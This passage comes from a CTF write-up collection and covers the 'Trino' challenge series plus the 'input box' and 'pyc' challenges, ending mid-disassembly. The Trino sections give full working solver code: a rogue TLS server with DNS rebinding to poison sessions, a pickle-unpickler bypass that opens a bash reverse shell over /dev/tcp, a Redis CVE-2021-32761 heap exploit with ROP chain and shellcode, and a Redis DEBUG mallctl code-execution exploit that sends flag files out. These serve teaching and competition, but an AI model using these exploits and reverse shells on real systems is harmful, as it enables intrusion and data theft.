'Connection': 'close',
'Content-Length': str(len(content)),
})
return '\r\n'.join([
f'HTTP/1.1 {code} Whatever',
'\r\n'.join([
f'{k}: {v}' for k, v in headers.items()
]),
'',
content,
]).encode()
def run_rogue_server(key, cert, port, delay, location, payloads):
payloads += [b'LAST_CHECK_DUMMY']
def run():
priv_key = RSA.import_key((Path(__file__).parent / Path(key)).read_text())
certs = [
base64.b64decode(''.join(
cert_line
for cert_line in cert.splitlines()
if not cert_line.startswith('-')
))
for cert in (Path(__file__).parent / Path(cert)).read_text().split('\n\n')
]
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', port))
server_socket.listen(5)
print('Server started.')
success_printed = [False]*len(payloads)
pi = 0
while pi < len(payloads):
client_socket, address = server_socket.accept()
print(f'Got a connection from {address}!')
print(f'Trying #{pi}')
session_id = payloads[pi].ljust(32, b'\0')
try:
# Sometimes throw AssertionError due to ALERT_CONTENT_TYPE at self-redirect
tls = TLS(client_socket, priv_key, certs, session_id)
http_request = tls.read()
assert b'fdzz' not in http_request
except:
# This indicates that the previous payload redirected to the current payload.
# Thus, we must retry previous payload.
print(f'Retry #{pi - 1}...')
pi -= 1
client_socket.close()
continue
if pi > 0 and not success_printed[pi - 1]:
print(f'Checked #{pi - 1} success. (payload {payloads[pi - 1]})')
success_printed[pi - 1] = True
pi += 1
time.sleep(delay)
headers = {
'Location': location + '?fdzz',
}
tls.write(get_http_response(302, headers, ''))
client_socket.close()
t = threading.Thread(target=run, daemon=True)
t.start()
return t
```
`albireo/solver_albireo.py`:
```python=1
#!/usr/bin/env python3
import socket, binascii
import requests
import base64
import time
import pickle
if __name__ == '__main__':
from TLS import run_rogue_server
else:
from .TLS import run_rogue_server
def primer(HOST, PORT, payload):
def nslookup(host):
return list(set(ai[4][0] for ai in socket.getaddrinfo(host, None) if ai[0] == socket.AF_INET))
def ip2hex(ip):
return binascii.hexlify(socket.inet_aton(ip)).decode('ascii')
s = requests.Session()
info = s.get(f'http://{HOST}:{PORT}/info').json()
# Disable Redis agents
for k in info['version']['trino']:
if 'redis' in k:
s.post(f'http://{HOST}:{PORT}/failover', json={'url': k})
poisoner_hex = ip2hex('REDACTED')
albireo_hex = ip2hex(info['network']['trino']['albireo'][0])
rebinder = f'{poisoner_hex}.{albireo_hex}.rbndr.us'
print(f'rebinder: {rebinder}')
s2 = requests.Session()
s2.get(f'http://{HOST}:{PORT}/')
sess = s2.cookies['session'].split('.')[0]
print(f'session: {sess}')
# init: b'\nms s:0123456789ab 0\n\r\n'
# append: b'\nms s:0123456789ab 6 MA\nABCDEF\r\n'
def ms_init(sid):
return f'\nms s:{sid} 0\n\r\n'.encode('ascii')
def ms_append(sid, dat):
assert len(dat) <= 6
return f'\nms s:{sid} {len(dat)} MA\n'.encode('ascii') + dat + b'\r\n'
payloads = [ms_init(sess)] + [
ms_append(sess, payload[i:i+6]) for i in range(0, len(payload), 6)
]
print(f'payloads count: {len(payloads)}')
t = run_rogue_server('key.pem', 'cert.pem', 65401, 0.2, f'https://{rebinder}:65401/', payloads)
while t.is_alive():
s.post(f'http://{HOST}:{PORT}/query', json={'url': f'https://{rebinder}:65401/'})
time.sleep(0.2)
# joining for "aesthetics"
t.join()
for c in s2.cookies:
c.expires += 60*60*24*30
return s2
if __name__ == '__main__':
HOST, PORT = 'localhost', 15961
s = primer(HOST, PORT, pickle.dumps({'_permanent': True, 'flag': 'albireo'}))
fetch = s.get(f'http://{HOST}:{PORT}/flag').json()
print(fetch['FLAG_ALBIREO'])
```
`albireo/__init__.py`:
```python=1
from .solver_albireo import primer
```
</details>
## H. Trino: Pieces
Category: Misc, Pwnable, Web\
Author: [Xion]\
Solvers: 2
<details>
<summary>Description</summary>
`Stage 2`
Stitch the `Pieces` together for the Big Picture.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Unpickle chaining with magic attributes to pop shell
With the primitives from `Trino: Albireo` we can now deserialize arbitrary data, but with a twist: the system uses a custom deserializer to only allow objects from `picklable`, as shown in `serializer.py`:
```python=7
class Unpickler(pickle.Unpickler):
def find_class(self, module, name):
assert module == 'picklable'
return getattr(__import__('picklable'), name)
```
The idea to solve this is to use everything inside `picklable`. For example, there are imports inside `picklable` such as `requester`, magic methods such as `__setattr__` and `__getattribute__`, as well as `__builtins__` and `__dict__` fields.
We can chain these as the following:
1. Set `picklable.picklable` to `picklable.__dict__` with `picklable.__setattr__`. This will be used in the latter steps.
2. Overwrite `__import__` to `picklable.__getattribute__`. This allows us to access attributes inside `picklable.__dict__`, as `__import__('picklable').attr => picklable.picklable.attr => picklable.__dict__.attr`.
3. Add everything inside `__builtins__` into `picklable.__dict__` using `update`.
4. Fetch `eval` and overwrite `picklable.picklable` again with `eval` through `picklable.__dict__.__setitem__`.
5. Enjoy `eval(cmd) == picklable.picklable.__call__(cmd)`! Note that `__builtins__['__import__']` is tainted so importing is not easy; use an already imported module, like `picklable.requester.whatwg_url.six.sys.modules["os"]`.
> Note: This challenge is in essence equivalent to [Balsn CTF 2019 pyshv2].
</details>
<details>
<summary>Solver Code</summary>
Unpickle exploit referenced from [Balsn CTF 2019 pyshv2] writeup.
`solver_pieces.py`:
```python=1
#!/usr/bin/env python3
import pickle, sys
from albireo import primer
### Unpickler bypass code referenced from https://ctftime.org/writeup/16723
class FakeMod(type(sys)):
modules = {}
def __init__(self, name):
self.d = {}
super().__init__(name)
def __getattribute__(self, name):
d = self()
return d[name]
def __call__(self):
return object.__getattribute__(self, "d")
def attr(s):
mod, name = s.split(".")
if mod not in FakeMod.modules:
FakeMod.modules[mod] = FakeMod(mod)
d = FakeMod.modules[mod]()
if name not in d:
def f(): pass
f.__module__ = mod
f.__qualname__ = name
f.__name__ = name
d[name] = f
return d[name]
def dumps(obj):
# use python version of dumps
# which is easier to hack
pickle.dumps = pickle._dumps
orig = sys.modules
sys.modules = FakeMod.modules
s = pickle.dumps(obj)
sys.modules = orig
return s
def craft(func, *args, dict=None, list=None, items=None):
class X:
def __reduce__(self):
tup = func, tuple(args)
if dict or list or items:
tup += dict, list, items
return tup
return X()
def get_payload(LHOST, LPORT):
c1 = craft(attr("picklable.__setattr__"), "picklable", attr("picklable.__dict__"))
c2 = craft(
attr("picklable.__getattribute__"),
"__builtins__",
items=[("__import__", attr("picklable.__getattribute__"))]
)
bs = craft(attr("picklable.get"), "__builtins__")
c3 = craft(attr("picklable.update"), bs)
ev = craft(attr("picklable.get"), "eval")
c4 = craft(attr("picklable.__setitem__"), "picklable", ev)
c5 = craft(attr("picklable.__call__"), f'__import__("requester").whatwg_url.six.sys.modules["os"].system("bash -c \'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\'")')
obj = craft(attr("picklable.__setattr__"), "code", [c1, c2, c3, c4, c5])
s = dumps(obj)
return s
###
if __name__ == '__main__':
HOST, PORT = 'localhost', 15961
LHOST, LPORT = 'REDACTED', 12345
# We can speed this up by splitting the payload & sending them concurrently,
# then run the payload in our desired order
s = primer(HOST, PORT, get_payload(LHOST, LPORT))
# If we pop shell, this will block!
fetch = s.get(f'http://{HOST}:{PORT}/')
```
</details>
## I. Trino: Rendezvous
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
`Stage 3 - 1`
`Rendezvous` back to Zero with this one weird trick!
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: RCE on Redis 6.2.4 32bit via [CVE-2021-32761] requiring incorrect mitigation (blocking `CONFIG SET`) bypass
After popping shell on `Trino: Pieces`, we can interact directly with Redis instances. For `Rendezvous` players must gain RCE on Redis 6.2.4 32bit, where many "harmful" commands are removed by config file.
Scanning through Redis CVEs players can find [CVE-2021-32761], which is applicable to this Redis version & architecture.
Root cause of the vuln is the lack of checked arithmetics + mixed use of differently-sized types. On 32bit systems, below code can overflow:
[redis/bitops.c#L991](https://github.com/redis/redis/blob/6.2.4/src/bitops.c#L991):
```c=991
if (highest_write_offset < bitoffset + bits - 1)
highest_write_offset = bitoffset + bits - 1;
```
This leads to the bitfield to not expand to the required size:
```c=1028
/* Lookup by making room up to the farest bit reached by
* this operation. */
if ((o = lookupStringForBitCommand(c,
highest_write_offset)) == NULL) {
zfree(ops);
return;
}
}
```
Thus, an attacker is able to write (and at the same time read previous value) out-of-bounds from a smaller bitfield, where the OOB index in terms of bytes from bitfield base ptr is about `0x20000000`(=512MB) due to overflow constraints.
Players can utilize Lua scripts by `eval` command to spray objects to heap, use the OOB bug to modify object type and leak addresses. Modify the type to a string and point it to a proper location in memory to gain nearly arbitrary read/write, then pop shell (GOT overwrite, etc.)
</details>
<details>
<summary>Solver Code</summary>
This exploit is meant to run on `Pieces` after popping shell.
`solver_rendezvous.py`:
```python=1
#!/usr/bin/env python3
import socket
import ctypes, struct
class FakeELF:
def __init__(self, **kwargs):
assert kwargs.keys() <= {'sym', 'got'}
self._address = 0
self.sym = kwargs.get('sym', {})
self.got = kwargs.get('got', {})
@property
def address(self):
return self._address
@address.setter
def address(self, base):
delta = base - self._address
self._address = base
self.sym = {k: v+delta for k, v in self.sym.items()}
self.got = {k: v+delta for k, v in self.got.items()}
class FakeRemote:
def __init__(self, host, port):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((host, port))
def send(self, data):
if isinstance(data, str):
data = data.encode('ascii')
self.s.send(data)
def recv(self, length):
data = b''
while len(data) < length:
recv = self.s.recv(length - len(data))
if not recv:
raise EOFError
data += recv
return data
def recvall(self):
data = b''
while True:
recv = self.s.recv(0x1000)
if not recv:
break
data += recv
return data
def recvuntil(self, until, drop=False):
data = b''
while not data.endswith(until):
recv = self.s.recv(1)
if not recv:
raise EOFError
data += recv
return data[:-len(until)] if drop else data
def close(self):
self.s.close()
class FakeLogger:
def info(self, s):
print(f'[*] {s}')
def success(self, s):
print(f'[+] {s}')
HOST, PORT = 'rendezvous', 65402
p = FakeRemote(HOST, PORT)
log = FakeLogger()
binary = FakeELF(got={'strtold': 0x246108, 'fcntl64': 0x246364, 'vsnprintf': 0x246234, 'backtrace': 0x2460cc})
libc = FakeELF(sym={'system': 0x3ec00, 'mprotect': 0xf5fd0, 'strtold': 0x35790, 'vsnprintf': 0x6fdd0, '_exit': 0xc0c45})
ld = FakeELF(sym={'_rtld_global': 0x29040})
def query(qs):
def _query(q):
if isinstance(q, str):
q = q.encode('ascii')
if isinstance(q, (list, tuple)):
p.send(f'*{len(q)}\r\n'.encode('ascii'))
for qe in q:
_query(qe)
else:
assert isinstance(q, (bytes, bytearray))
p.send(f'${len(q)}\r\n'.encode('ascii') + q + b'\r\n')
def _resp():
first = p.recv(1)
if first == b'+':
return p.recvuntil(b'\r\n', drop=True)
elif first == b'-':
err = p.recvuntil(b'\r\n', drop=True)
raise RuntimeError(f'Redis returned Error: {err}')
elif first == b':':
return int(p.recvuntil(b'\r\n', drop=True))
elif first == b'$':
length = int(p.recvuntil(b'\r\n', drop=True))
data = p.recv(length)
assert p.recv(2) == b'\r\n'
return data
else:
assert first == b'*'
length = int(p.recvuntil(b'\r\n', drop=True))
return [_resp() for _ in range(length)]
if isinstance(qs, str):
qs = qs.encode('ascii')
if isinstance(qs, (bytes, bytearray)):
p.send(qs + b'\r\n')
else:
_query(qs)
return _resp()
def p32(v, endian='little'):
return struct.pack('<I' if endian=='little' else '>I', v)
def u32(v, endian='little'):
return struct.unpack('<I' if endian=='little' else '>I', v)[0]
def endian_rev(v):
return u32(p32(v, endian='big'), endian='little')
# Note: The use of debug command is avoided, allowing the exploit to be sent with a single eval command.
log.info('Spraying heap & setting up memory layout...')
assert query('''eval "for i=0,0x180000,1 do redis.call('set', 'K'..i, 0) end return 1337" 0''') == 1337
assert query('''eval "for i=0,0x180000,1 do if i%0x100==0 then redis.call('set', 'IIIIIIIIIIIIIIII'..i, 0) end redis.call('set', 'K'..i, '') end return 31337" 0''') == 31337
assert query('''setbit fill 335544320 0''') == 0
assert query('''setbit L 3221225472 0''') == 0
# leak address from K{K_idx} (embstr)
K_addr = endian_rev(query('''bitfield L set u32 4294967288 0''')[0]) - 0xf
assert K_addr & 0x7 == 0
log.info(f'Leaked address {hex(K_addr)}')
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_INT
assert query(f'bitfield L set i64 4294967295 {0x10 >> 1}')[0] & 0x7f == 0x80 >> 1
K_idx = query('''eval "for i=0x100000,0,-1 do if redis.call('get', 'K'..i)~='' then return i end end return -1" 0''') - 1
assert K_idx >= 0
log.success(f'Leak was from K{K_idx}')
L_addr = K_addr - 0x20000000
L_data = L_addr + 9
log.info(f'sdshdr32 struct address of L: {hex(L_addr)} (data {hex(L_data)})')
# prepare fake sds object inside L
fakesds = L_addr + 0x17000000
fakesds_data = fakesds + 9
assert query([
'setrange', 'L', str(fakesds - L_data),
p32(0x7fffffff)*2 + bytes([3])
]) == 0x18000001
# set K{K_idx + 1} ptr to fakesds_data
delta = ctypes.c_int32(fakesds_data).value - ctypes.c_int32(K_addr + 0x10 + 0xf).value
assert query(f'incrby K{K_idx + 1} {delta}') == ctypes.c_int32(fakesds_data).value
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_RAW
assert query('bitfield L set i64 4294967295 0')[0] == 0x10 >> 1
log.success(f'K{K_idx + 1}->ptr = fakesds @ {hex(fakesds)}')
def reader(addr, length):
ofs = (addr - fakesds_data) & 0xffffffff
assert ofs + length <= 0x20000000
return query(f'getrange K{K_idx + 1} {ofs} {ofs + length - 1}')
# leak libc address
expected_at = K_addr - ((K_idx & 0xff) + 1) * 0x10 + 4
for i in range(0x1000):
addr = u32(reader(expected_at + i * 0x10, 4)) + 0x1c460
if addr & 0xfff == 0:
libc.address = addr
break
else:
assert False
assert reader(libc.address, 4) == b'\x7FELF'
log.success(f'libc base: {hex(libc.address)}')
# 0x678000 for local, 0x679000 at remote. Dunno why...
for ofs in range(0x678000, 0x679001, 0x1000):
log.info(f'Trying offset {hex(ofs)}...')
ld.address = libc.address + ofs
if reader(ld.address, 4) == b'\x7FELF':
log.success(f'ld base found at libc + {hex(ofs)}')
break
else:
assert False
log.info (f'ld base: {hex(ld.address)}')
# get link_map struct of redis-server binary from _rtld_global._dl_ns._ns_loaded
rtld_global = ld.sym['_rtld_global']
link_map = u32(reader(rtld_global, 4))
log.success(f'link_map: {hex(link_map)}')
# leak redis-server binary from link_map
binary.address = u32(reader(link_map, 4))
assert binary.address & 0xfff == 0
log.success(f'redis-server base: {hex(binary.address)}')
# now set fakesds to some data inside redis-server (offset found using script below)
'''
>>> for i in range(0x100000):
... length = u32(bin.read(i, 4))
... alloc = u32(bin.read(i+4, 4))
... flag = bin.read(i+8, 1)[0]
... if length in range(0x20000000, 0x80000000) and alloc >= length and flag & 0b111 == 3:
... print(hex(i), hex(length), hex(alloc), hex(flag))
...
0x15a 0x74a8001b 0x74a8001b 0x1b
0x1f9 0x2756d67d 0x99a996ab 0x2b
0x255 0x44180004 0xc1b00001 0x3
(...)
'''
fakesds_bin = binary.address + 0x255
fakesds_bin_data = fakesds_bin + 9
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_INT
assert query(f'bitfield L set i64 4294967295 {0x10 >> 1}')[0] == 0
# set K{K_idx + 1} ptr to fakesds_bin_data
delta = ctypes.c_int32(fakesds_bin_data).value - ctypes.c_int32(fakesds_data).value
assert query(f'incrby K{K_idx + 1} {delta}') == ctypes.c_int32(fakesds_bin_data).value
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_RAW
assert query('bitfield L set i64 4294967295 0')[0] == 0x10 >> 1
log.success(f'K{K_idx + 1}->ptr = fakesds @ {hex(fakesds_bin_data)}')
def writer(addr, data):
ofs = (addr - fakesds_bin_data) & 0xffffffff
assert ofs + len(data) <= 0x20000000
assert query(['setrange', f'K{K_idx + 1}', str(ofs), data]) == 0x44180004
# overwrite fcntl64@got with return FD_CLOEXEC;
# Note: We already have RCE, so simply opening a new port from attacker server
# & writing to it would suffice. This is just to re-use the already open
# connection as a POC
writer(binary.got['fcntl64'], p32(libc.address + 0x2ffa8))
# overwrite strtold@got with ROP popN-ret gadget
shellcode_addr = (L_data + 0x1000) & (~0xfff)
'''
libc gadgets
0x000af30b : add esp, 0x38 ; pop ebx ; ret
0x000ae987 : pop eax ; pop edi ; pop esi ; ret
0x000190f1 : ret
0x000314db : ret 0x1174
esp + 0x1450
'''
writer(binary.got['strtold'], p32(libc.address + 0xaf30b))
payload = b''.join([
b' \0\0\0', # isspace(buf[0])
p32(0),
p32(libc.sym['mprotect']), # first ret
p32(libc.address + 0xae987),
p32(shellcode_addr),
p32(0x1000),
p32(7), # on mprotect success, eax = 0 which is an error for string2ld.
] + [p32(libc.address + 0x190f1)] * 0x9d + [
p32(libc.address + 0x314db),
p32(binary.address + 0x576c8) # inside function epilogue of string2ld
])
try:
query([
b'incrbyfloat',
b'lol',
payload
])
except:
pass # We expect Redis to return ERR!
else:
assert False
# fix it back up :)
writer(binary.got['strtold'], p32(libc.sym['strtold']))
# write our magical shellcode
'''
mov eax, dword ptr [esp+0xc]
cmp dword ptr [eax], 0x6e6b6e75 # 'unkn'
jnz $+9
mov ecx, 0xdeadbeef => libc.sym['vsnprintf']
xor eax, eax
jmp ecx
pusha
mov ecx, 0x1337c0d3 => shell script addr
push ecx
mov ecx, 0xcafebabe => libc.sym['system']
call ecx
pop ecx
popa
xor eax, eax
ret
'''
shellcode = b'\x8B\x44\x24\x0C\x81\x38\x75\x6E\x6B\x6E\x74\x09\xB9\xEF\xBE\xAD\xDE\x31\xC0\xFF\xE1\x60\xB9\xD3\xC0\x37\x13\x51\xB9\xBE\xBA\xFE\xCA\xFF\xD1\x59\x61\x31\xC0\xC3'
shellcode = shellcode.ljust(0x800)
shellcode = shellcode.replace(p32(0xdeadbeef), p32(libc.sym['vsnprintf']))
shellcode = shellcode.replace(p32(0x1337c0d3), p32(shellcode_addr + 0x800))
shellcode = shellcode.replace(p32(0xcafebabe), p32(libc.sym['system']))
# send payload to top fd
shellcode += f'''bash -c 'i=100; while [ $i -ge 0 ]; do if [ -e /proc/self/fd/$i ]; then cat /flag_* 1>&$i; fi; i=$(( i - 1 )); done\''''.encode('ascii')
assert query([
'setrange', 'L', str(shellcode_addr - L_data),
shellcode
]) == 0x18000001
log.success(f'Shellcode @ {hex(shellcode_addr)}')
# hook vsnprintf to our shellcode to trigger our exploit at every unknown command
writer(binary.got['vsnprintf'], p32(shellcode_addr))
# just in case we crash, we want it to exit it instantly
writer(binary.got['backtrace'], p32(libc.sym['_exit']))
# we won't be doing any AAR/W, fix the memory structure so we don't crash at saves
# ...but we still freeze at bgsaves :crying_cat:
assert query(f'bitfield L set i64 4294967295 {0x010010 >> 1}')[0] == 0
assert query(f'bitfield L set u32 4294967288 {endian_rev(K_addr + 0xf)}')[0] == 0
# now test the exploit!
p.close()
p = FakeRemote(HOST, PORT)
p.send(b'lol\r\n')
print(p.recvuntil(b'}'))
```
</details>
## J. Trino: Mirai
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
`Stage 3 - 2`
No more years-old dead PoCs, take a step into `Mirai`.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: RCE on Redis latest (6.2.6) default config via 0-day (or... N-day?)
After popping shell on `Trino: Pieces`, we can interact directly with Redis instances. For `Mirai` players must gain RCE on Redis 6.2.6 (latest stable) with default configs.
There is currently no publicly known RCE exploits against Redis of version 6 and above. Previously known techniques such as Master-Slave replication + Module loading does not work after executable bit check was introduced.
So this challenge calls for a 0-day, let's get our hands dirty and dive into Redis source code!
Quick inspection into the most fishiest command `DEBUG` show that the command implements many undocumented subcommands such as `mallctl` which allows direct access to jemalloc mallctl namespace. Checking out [jemalloc mallctl documentation](https://nxmnpg.lemoda.net/3/mallctl#11) we see someting similar to the infamous glibc malloc hook: `arena.<i>.extent_hooks`. Setting this to any invalid address, attach a debugger and run any commands that triggers memory allocation/free; we get a crash!
We have a stunningly simple rip-control. Noticing what functions are called at certain memory operations, we can call arbitrary function with attacker-controlled data in rdi. Write our payload, `debug object` to get payload address, `debug mallctl` and do any memory operation you chose to use and pop flag!
> Note 1: Anyone with access to a Redis instance can already do anything, just not RCE(until now!). The threat model was not clear enough to determine whether or not this is a "vulnerability". Nevertheless, the author responsibly disclosed this directly to the Redis core developer team at October 5th, 2021. This bug is fixed from Redis 7 RC1, and one can check the [release notes](https://raw.githubusercontent.com/redis/redis/7.0/00-RELEASENOTES) to find out the vuln too π
> Note 2: After Pull [#9202](https://github.com/redis/redis/pull/9202) `set-disable-deny-scripts` was available, which allows RCE even in a non-interactive (no-output) model by setting the flag and sending a single exploitation script in Lua! (until Pull [#9920](https://github.com/redis/redis/pull/9920) disabled `DEBUG` by default)
</details>
<details>
<summary>Solver Code</summary>
This exploit is meant to run on `Pieces` after popping shell.
`solver_mirai.py`:
```python=1
#!/usr/bin/env python3
import socket
import ctypes, struct
import os, time
class FakeRemote:
def __init__(self, host, port):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((host, port))
def send(self, data):
if isinstance(data, str):
data = data.encode('ascii')
self.s.send(data)
def recv(self, length):
data = b''
while len(data) < length:
recv = self.s.recv(length - len(data))
if not recv:
raise EOFError
data += recv
return data
def recvall(self):
data = b''
while True:
recv = self.s.recv(0x1000)
if not recv:
break
data += recv
return data
def recvuntil(self, until, drop=False):
data = b''
while not data.endswith(until):
recv = self.s.recv(1)
if not recv:
raise EOFError
data += recv
return data[:-len(until)] if drop else data
def info(self, s):
print(f'[*] {s}')
def success(self, s):
print(f'[+] {s}')
def close(self):
self.s.close()
def query(qs):
def _query(q):
if isinstance(q, str):
q = q.encode('ascii')
if isinstance(q, (list, tuple)):
p.send(f'*{len(q)}\r\n'.encode('ascii'))
for qe in q:
_query(qe)
else:
assert isinstance(q, (bytes, bytearray))
p.send(f'${len(q)}\r\n'.encode('ascii') + q + b'\r\n')
def _resp():
first = p.recv(1)
if first == b'+':
return p.recvuntil(b'\r\n', drop=True)
elif first == b'-':
err = p.recvuntil(b'\r\n', drop=True)
raise RuntimeError(f'Redis returned Error: {err}')
elif first == b':':
return int(p.recvuntil(b'\r\n', drop=True))
elif first == b'$':
length = int(p.recvuntil(b'\r\n', drop=True))
data = p.recv(length)
assert p.recv(2) == b'\r\n'
return data
else:
assert first == b'*'
length = int(p.recvuntil(b'\r\n', drop=True))
return [_resp() for _ in range(length)]
if isinstance(qs, str):
qs = qs.encode('ascii')
if isinstance(qs, (bytes, bytearray)):
p.send(qs + b'\r\n')
else:
_query(qs)
return _resp()
def query_addr(obj):
return int(query(f'''debug object {obj}''').split()[1][3:], 16)
def p64(v, endian='little'):
return struct.pack('<Q' if endian=='little' else '>Q', v)
def u64(v, endian='little'):
return struct.unpack('<Q' if endian=='little' else '>Q', v)[0]
LHOST, LPORT = 'pieces', 9999
HOST, PORT = 'mirai', 65403
if os.fork() == 0:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', LPORT))
s.listen(1)
conn, addr = s.accept()
while True:
data = conn.recv(0x1000)
if not data:
break
print(data)
exit()
time.sleep(0.5)
bash_cmd = f'cat /flag* > /dev/tcp/{LHOST}/{LPORT}'
cmds = [
# '0123456789abcdef0123456789ab'
"echo '#!/bin/bash'>/data/a",
] + [
f"echo -n '{bash_cmd[st:st+9]}'>>/data/a" for st in range(0, len(bash_cmd), 9)
] + [
"chmod 777 /da*/a",
"/da*/a"
]
assert all(len(cmd) <= 0x1c for cmd in cmds)
cmds = [cmd.ljust(0x1c, '\0') for cmd in cmds]
p = FakeRemote(HOST, PORT)
assert query('''config set save ""''') == b'OK'
assert query('''debug mallctl background_thread 0''') in (0, 1) # 1: first run, 0: following runs
for i in range(len(cmds)):
assert query(f'''setbit K{i} 400000 0''') == 0
# can be replaced with "set I0 0" => "debug object I0"
libc_base = query('''debug mallctl thread.allocatedp''') + 0x38c0
assert libc_base & 0xfff == 0
libssl_base = libc_base + 0x4cd000
# for each cmds, try 0x100 times to get adjacent embstr
cmd_addrs = []
for i in range(len(cmds)):
for j in range(0x100):
assert query(['set', f'cmd{i}_{j}', cmds[i]]) == b'OK'
assert query(['set', f'sys{i}_{j}',
p64(libc_base + 0x449c0).ljust(0x1c)
]) # system@libc offset
cmd_addr, sys_addr = query_addr(f'cmd{i}_{j}'), query_addr(f'sys{i}_{j}')
if sys_addr == cmd_addr + 0x30:
break
else:
assert False
cmd_addrs.append(cmd_addr)
# 0x0000000000035ae0 : mov rdi, qword ptr [rdi] ; jmp qword ptr [rdi + 0x30]
for i in range(len(cmds)):
cmd, cmd_addr = cmds[i], cmd_addrs[i]
assert query(['set', 'extent_hook',
p64(cmd_addr+0x13)+p64(libssl_base+0x35ae0)
]) == b'OK'
extent_hook_addr = query_addr('extent_hook')
original_extent_hook = query(f'''debug mallctl arena.0.extent_hooks {extent_hook_addr+0x13}''')
assert query(f'''del K{i}''') == 1
assert query('''memory purge''') == b'OK' # command executed!
# cleanup :)
assert query(f'''debug mallctl arena.0.extent_hooks {original_extent_hook}''') == extent_hook_addr+0x13
assert query('flushall sync') == b'OK'
assert query('memory purge') == b'OK'
p.close()
```
</details>
## L. input box
Category: Misc\
Author: [okas832]\
Solvers: 13
<details>
<summary>Description</summary>
Only One Web Server
No Server-Side Code
No Information
Only One Input Box
</details>
<details>
<summary>Solution</summary>
By reading the short assests from web page, we can find that texts in input box are copied to `div[id=tmp]` by javascript code, but the text you wrote will not show up even if text is not white and not transparent by reading the css code. So, we can know that the font, `sans.otf` is not normal. (Or you can know this by dropping the font related http reqest/response.)
Note : If you think you saw everything and got no information, watch [this](https://www.youtube.com/watch?v=BLikP6BDH5w).
We can inspect this opentype font with [Opentype.js](https://opentype.js.org).
Most of the glyphs in font has empty glyph except one. Glyph number 1076, named `G00979` has `GOOD` shaped glyph. So, our goal is to find a proper value of input box that makes the font shows `G00979`.
`G00979` cannot be created by only one unicode character, but can be created from glyphs according to the `GSUB`, [Glyph Substitution Table](http://adobe-type-tools.github.io/afdko/OpenTypeFeatureFileSpecification.html#). In lookup table, there are many `substitute glyphA glyphB by glyphC`. With these, we can find the candidates of `glyphA glyphB` that makes `glyphC`.
For not making this challenge annoying, simply following the previous glyph and one input that makes the target glyph(there is only one possible way to make target glyph), will get a proper input.
Challenge idea reference : [Fontemon](https://www.coderelay.io/fontemon.html)
</details>
<details>
<summary>Solver Code</summary>
Instead of opentype.js, I use [ttx](https://fonttools.readthedocs.io/en/latest/ttx.html) to parse otf. And handling the initial glyph is little complicated, so I just ignore that with flag format.
```python=
import xml.etree.ElementTree as elemTree
tree = elemTree.parse('./sans.ttx')
root = tree.getroot()
dic = {}
for sub in root[9][3][2:]:
subst = sub[2]
if len(sub[2]) == 1:
ls = sub[2][0]
else:
ls = sub[2][1][0]
# finded LigatureSet
gname = ls.attrib["glyph"]
for lig in ls:
ipt = lig.attrib["components"]
dg = lig.attrib["glyph"]
if not dic.get(dg, None):
dic[dg] = []
dic[dg].append((ipt, gname))
i2c = {}
for glyphid in root[0]:
gid = int(glyphid.attrib["id"])
if gid >= 1 and gid <= 96:
i2c[glyphid.attrib["name"]] = chr(gid + 0x1f)
it = "G00979"
flag = ""
while not flag.startswith("N{"):
ipt, it = dic[it][0]
flag = i2c[ipt] + flag
print("Go" + flag)
```
</details>
## M. pyc
Category: Reversing\
Author: [okas832]\
Solvers: 13
<details>
<summary>Description</summary>
Just analyzing result of `dis.dis` is not fun at all.
</details>
<details>
<summary>Solution</summary>
Let's disassemble the module first
```
vagrant ~ $ python3.10
Python 3.10.2 (main, Jan 15 2022, 18:03:19) [GCC 7.5.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> f = open("prob.pyc", "rb")
>>> import dis
>>> import marshal
>>> f.seek(16)
16
>>> dis.dis(marshal.load(f))
1 0 LOAD_CONST 0 (0)
2 LOAD_CONST 1 (None)
4 IMPORT_NAME 0 (struct)
6 STORE_NAME 0 (struct)
3 8 BUILD_LIST 0
10 LOAD_CONST 2 ((161, 55, 37, 106, 136, 128, 88, 143, 139, 247, 182, 192, 140, 132, 222, 141, 79, 38, 69, 75, 184, 232, 66, 72, 152, 14, 202, 49, 143, 58, 194, 161, 241, 230, 237, 118, 254, 112, 85, 32, 220, 192, 179, 201, 216, 132, 141, 42, 53))
12 LIST_EXTEND 1
14 STORE_NAME 1 (k)
4 16 BUILD_LIST 0
18 LOAD_CONST 3 ((239, 88, 97, 17, 198, 239, 121, 208, 223, 159, 135, 245, 211, 181, 173, 210, 1, 22, 49, 20, 254, 132, 118, 15, 199, 87, 250, 100, 208, 84, 241, 146, 149, 185, 153, 70, 161, 2, 48, 86, 131, 173, 220, 187, 189, 165, 205, 9, 72))
20 LIST_EXTEND 1
22 STORE_NAME 2 (key)
5 24 BUILD_LIST 0
